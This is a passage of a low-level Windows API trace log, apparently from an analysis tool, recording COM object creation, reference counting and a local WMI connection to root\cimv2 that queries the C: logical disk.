Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691ee30 | out: ppvObject=0x691ee30*=0x0) returned 0x80004002 [0207.533] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027250, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ee44 | out: ppvObject=0x691ee44*=0x6030a20) returned 0x0 [0207.534] WbemDefPath:IUnknown:Release (This=0x6027250) returned 0x0 [0207.534] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ea64 | out: ppvObject=0x691ea64*=0x6030a20) returned 0x0 [0207.534] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ea20 | out: ppvObject=0x691ea20*=0x0) returned 0x80004002 [0207.534] WbemDefPath:IUnknown:AddRef (This=0x6030a20) returned 0x3 [0207.534] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e37c | out: ppvObject=0x691e37c*=0x0) returned 0x80004002 [0207.534] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e32c | out: ppvObject=0x691e32c*=0x0) returned 0x80004002 [0207.534] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e338 | out: ppvObject=0x691e338*=0x66ccba8) returned 0x0 [0207.534] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccba8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e340 | out: pCid=0x691e340*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0207.534] WbemDefPath:IUnknown:Release (This=0x66ccba8) returned 0x3 [0207.534] CoGetContextToken (in: pToken=0x691e398 | out: pToken=0x691e398) returned 0x0 [0207.534] CoGetContextToken (in: pToken=0x691e348 | out: pToken=0x691e348) returned 0x0 [0207.534] CoGetContextToken (in: pToken=0x691e7a0 | out: pToken=0x691e7a0) returned 0x0 [0207.534] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e830 | out: ppvObject=0x691e830*=0x0) returned 0x80004002 [0207.534] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x2 [0207.534] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x1 [0207.534] CoGetContextToken (in: pToken=0x691f128 | out: pToken=0x691f128) returned 0x0 [0207.534] CoGetContextToken (in: pToken=0x691f088 | out: pToken=0x691f088) returned 0x0 [0207.534] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x691f158*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x691f154 | out: ppvObject=0x691f154*=0x6030a20) returned 0x0 [0207.534] WbemDefPath:IUnknown:AddRef (This=0x6030a20) returned 0x3 [0207.534] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x2 [0207.534] WbemDefPath:IWbemPath:SetText (This=0x6030a20, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0207.534] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a20, puCount=0x691f2dc | out: puCount=0x691f2dc*=0x0) returned 0x0 [0207.534] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x691f2d8*=0x0, pszText=0x0 | out: puBuffLength=0x691f2d8*=0x20, pszText=0x0) returned 0x0 [0207.535] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x691f2d8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f2d8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0207.535] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030a20, uRequestedInfo=0x0, puResponse=0x691f2e4 | out: puResponse=0x691f2e4*=0xc19) returned 0x0 [0207.535] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a20, puCount=0x691f2dc | out: puCount=0x691f2dc*=0x0) returned 0x0 [0207.535] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030a20, uRequestedInfo=0x0, puResponse=0x691f2e4 | out: puResponse=0x691f2e4*=0xc19) returned 0x0 [0207.535] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030a20, uRequestedInfo=0x0, puResponse=0x691f2e4 | out: puResponse=0x691f2e4*=0xc19) returned 0x0 [0207.535] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a20, puCount=0x691f25c | out: puCount=0x691f25c*=0x0) returned 0x0 [0207.535] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x691f248 | out: puCount=0x691f248*=0x2) returned 0x0 [0207.535] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x691f244*=0x0, pszText=0x0 | out: puBuffLength=0x691f244*=0xf, pszText=0x0) returned 0x0 [0207.535] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x691f244*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f244*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0207.535] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f1f8 | out: ppv=0x691f1f8*=0xb51e34) returned 0x0 [0207.535] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f1f0 | out: pAptType=0x691f1f0*=1) returned 0x0 [0207.535] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f1f4 | out: ppvObject=0x691f1f4*=0x0) returned 0x80004002 [0207.535] IUnknown:Release (This=0xb51e34) returned 0x1 [0207.536] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691eb60 | out: ppv=0x691eb60*=0x60272e0) returned 0x0 [0207.536] WbemDefPath:IUnknown:QueryInterface (in: This=0x60272e0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691ed78 | out: ppvObject=0x691ed78*=0x0) returned 0x80004002 [0207.536] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60272e0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ed8c | out: ppvObject=0x691ed8c*=0x6030b00) returned 0x0 [0207.536] WbemDefPath:IUnknown:Release (This=0x60272e0) returned 0x0 [0207.536] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e9ac | out: ppvObject=0x691e9ac*=0x6030b00) returned 0x0 [0207.536] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691e968 | out: ppvObject=0x691e968*=0x0) returned 0x80004002 [0207.536] WbemDefPath:IUnknown:AddRef (This=0x6030b00) returned 0x3 [0207.536] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e2c4 | out: ppvObject=0x691e2c4*=0x0) returned 0x80004002 [0207.536] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e274 | out: ppvObject=0x691e274*=0x0) returned 0x80004002 [0207.536] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e280 | out: ppvObject=0x691e280*=0x66ccc08) returned 0x0 [0207.536] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccc08, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e288 | out: pCid=0x691e288*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0207.536] WbemDefPath:IUnknown:Release (This=0x66ccc08) returned 0x3 [0207.536] CoGetContextToken (in: pToken=0x691e2e0 | out: pToken=0x691e2e0) returned 0x0 [0207.536] CoGetContextToken (in: pToken=0x691e290 | out: pToken=0x691e290) returned 0x0 [0207.536] CoGetContextToken (in: pToken=0x691e6e8 | out: pToken=0x691e6e8) returned 0x0 [0207.536] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e778 | out: ppvObject=0x691e778*=0x0) returned 0x80004002 [0207.536] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x2 [0207.536] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x1 [0207.537] CoGetContextToken (in: pToken=0x691f070 | out: pToken=0x691f070) returned 0x0 [0207.537] CoGetContextToken (in: pToken=0x691efd0 | out: pToken=0x691efd0) returned 0x0 [0207.537] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x691f0a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x691f09c | out: ppvObject=0x691f09c*=0x6030b00) returned 0x0 [0207.537] WbemDefPath:IUnknown:AddRef (This=0x6030b00) returned 0x3 [0207.537] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x2 [0207.537] WbemDefPath:IWbemPath:SetText (This=0x6030b00, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0207.537] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x691f220 | out: puCount=0x691f220*=0x2) returned 0x0 [0207.537] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=4, puBuffLength=0x691f21c*=0x0, pszText=0x0 | out: puBuffLength=0x691f21c*=0xf, pszText=0x0) returned 0x0 [0207.537] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=4, puBuffLength=0x691f21c*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f21c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0207.537] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f220 | out: ppv=0x691f220*=0xb51e34) returned 0x0 [0207.537] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f218 | out: pAptType=0x691f218*=1) returned 0x0 [0207.537] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f21c | out: ppvObject=0x691f21c*=0x0) returned 0x80004002 [0207.537] IUnknown:Release (This=0xb51e34) returned 0x1 [0207.537] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691ee40 | out: ppv=0x691ee40*=0x6024de0) returned 0x0 [0207.538] WbemLocator:IUnknown:QueryInterface (in: This=0x6024de0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691f058 | out: ppvObject=0x691f058*=0x0) returned 0x80004002 [0207.538] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024de0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691f06c | out: ppvObject=0x691f06c*=0x6027320) returned 0x0 [0207.538] WbemLocator:IUnknown:Release (This=0x6024de0) returned 0x0 [0207.538] WbemLocator:IUnknown:QueryInterface (in: This=0x6027320, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ec8c | out: ppvObject=0x691ec8c*=0x6027320) returned 0x0 [0207.538] WbemLocator:IUnknown:QueryInterface (in: This=0x6027320, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ec48 | out: ppvObject=0x691ec48*=0x0) returned 0x80004002 [0207.538] WbemLocator:IUnknown:AddRef (This=0x6027320) returned 0x3 [0207.538] WbemLocator:IUnknown:QueryInterface (in: This=0x6027320, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e5a4 | out: ppvObject=0x691e5a4*=0x0) returned 0x80004002 [0207.538] WbemLocator:IUnknown:QueryInterface (in: This=0x6027320, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e554 | out: ppvObject=0x691e554*=0x0) returned 0x80004002 [0207.538] WbemLocator:IUnknown:QueryInterface (in: This=0x6027320, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e560 | out: ppvObject=0x691e560*=0x0) returned 0x80004002 [0207.538] CoGetContextToken (in: pToken=0x691e5c0 | out: pToken=0x691e5c0) returned 0x0 [0207.538] CoGetContextToken (in: pToken=0x691e570 | out: pToken=0x691e570) returned 0x0 [0207.538] CoGetContextToken (in: pToken=0x691e9c8 | out: pToken=0x691e9c8) returned 0x0 [0207.538] WbemLocator:IUnknown:QueryInterface (in: This=0x6027320, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ea58 | out: ppvObject=0x691ea58*=0x0) returned 0x80004002 [0207.538] WbemLocator:IUnknown:Release (This=0x6027320) returned 0x2 [0207.538] WbemLocator:IUnknown:Release (This=0x6027320) returned 0x1 [0207.538] CoGetContextToken (in: pToken=0x691f038 | out: pToken=0x691f038) returned 0x0 [0207.538] CoGetContextToken (in: pToken=0x691ef98 | out: pToken=0x691ef98) returned 0x0 [0207.538] WbemLocator:IUnknown:QueryInterface (in: This=0x6027320, riid=0x691f068*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x691f064 | out: ppvObject=0x691f064*=0x6027320) returned 0x0 [0207.538] WbemLocator:IUnknown:AddRef (This=0x6027320) returned 0x3 [0207.538] WbemLocator:IUnknown:Release (This=0x6027320) returned 0x2 [0207.538] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x691f1fc | out: puCount=0x691f1fc*=0x2) returned 0x0 [0207.538] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=8, puBuffLength=0x691f1f8*=0x0, pszText=0x0 | out: puBuffLength=0x691f1f8*=0xf, pszText=0x0) returned 0x0 [0207.538] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=8, puBuffLength=0x691f1f8*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f1f8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0207.539] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x691f0d4 | out: ppv=0x691f0d4*=0x6027230) returned 0x0 [0207.539] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027230, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x691f168 | out: ppNamespace=0x691f168*=0x603331c) returned 0x0 [0207.862] WbemLocator:IUnknown:QueryInterface (in: This=0x603331c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691f004 | out: ppvObject=0x691f004*=0xb5b6d4) returned 0x0 [0207.862] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b6d4, pProxy=0x603331c, pAuthnSvc=0x691f054, pAuthzSvc=0x691f050, pServerPrincName=0x691f048, pAuthnLevel=0x691f04c, pImpLevel=0x691f03c, pAuthInfo=0x691f040, pCapabilites=0x691f044 | out: pAuthnSvc=0x691f054*=0xa, pAuthzSvc=0x691f050*=0x0, pServerPrincName=0x691f048, pAuthnLevel=0x691f04c*=0x6, pImpLevel=0x691f03c*=0x2, pAuthInfo=0x691f040, pCapabilites=0x691f044*=0x1) returned 0x0 [0207.862] WbemLocator:IUnknown:Release (This=0xb5b6d4) returned 0x1 [0207.862] WbemLocator:IUnknown:QueryInterface (in: This=0x603331c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691eff8 | out: ppvObject=0x691eff8*=0xb5b6f4) returned 0x0 [0207.863] WbemLocator:IUnknown:QueryInterface (in: This=0x603331c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691eff4 | out: ppvObject=0x691eff4*=0xb5b6d4) returned 0x0 [0207.863] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b6d4, pProxy=0x603331c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0207.863] WbemLocator:IUnknown:Release (This=0xb5b6d4) returned 0x2 [0207.863] WbemLocator:IUnknown:Release (This=0xb5b6f4) returned 0x1 [0207.863] CoTaskMemFree (pv=0xbd4948) [0207.863] WbemLocator:IUnknown:Release (This=0x6027230) returned 0x0 [0207.863] WbemLocator:IUnknown:QueryInterface (in: This=0x603331c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ebf4 | out: ppvObject=0x691ebf4*=0xb5b6f4) returned 0x0 [0207.863] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ebb0 | out: ppvObject=0x691ebb0*=0x0) returned 0x80004002 [0207.864] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691e9cc | out: ppvObject=0x691e9cc*=0x0) returned 0x80004002 [0207.865] WbemLocator:IUnknown:AddRef (This=0xb5b6f4) returned 0x3 [0207.865] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e50c | out: ppvObject=0x691e50c*=0x0) returned 0x80004002 [0207.865] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e4bc | out: ppvObject=0x691e4bc*=0x0) returned 0x80004002 [0207.867] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e4c8 | out: ppvObject=0x691e4c8*=0xb5b654) returned 0x0 [0207.867] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b654, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e4d0 | out: pCid=0x691e4d0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0207.867] WbemLocator:IUnknown:Release (This=0xb5b654) returned 0x3 [0207.867] CoGetContextToken (in: pToken=0x691e528 | out: pToken=0x691e528) returned 0x0 [0207.867] CoGetContextToken (in: pToken=0x691e930 | out: pToken=0x691e930) returned 0x0 [0207.867] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e9c0 | out: ppvObject=0x691e9c0*=0xb5b6dc) returned 0x0 [0207.867] WbemLocator:IRpcOptions:Query (in: This=0xb5b6dc, pPrx=0xb5b6f4, dwProperty=2, pdwValue=0x691e9e8 | out: pdwValue=0x691e9e8) returned 0x80004002 [0207.868] WbemLocator:IUnknown:Release (This=0xb5b6dc) returned 0x3 [0207.868] WbemLocator:IUnknown:Release (This=0xb5b6f4) returned 0x2 [0207.868] CoGetContextToken (in: pToken=0x691ef08 | out: pToken=0x691ef08) returned 0x0 [0207.868] CoGetContextToken (in: pToken=0x691ee68 | out: pToken=0x691ee68) returned 0x0 [0207.868] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x691ef38*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x691ef34 | out: ppvObject=0x691ef34*=0x603331c) returned 0x0 [0207.868] WbemLocator:IUnknown:AddRef (This=0x603331c) returned 0x4 [0207.868] WbemLocator:IUnknown:Release (This=0x603331c) returned 0x3 [0207.868] WbemLocator:IUnknown:Release (This=0x603331c) returned 0x2 [0207.868] SysStringLen (param_1=0x0) returned 0x0 [0207.868] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a20, puCount=0x691f2cc | out: puCount=0x691f2cc*=0x0) returned 0x0 [0207.868] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x691f2c8*=0x0, pszText=0x0 | out: puBuffLength=0x691f2c8*=0x20, 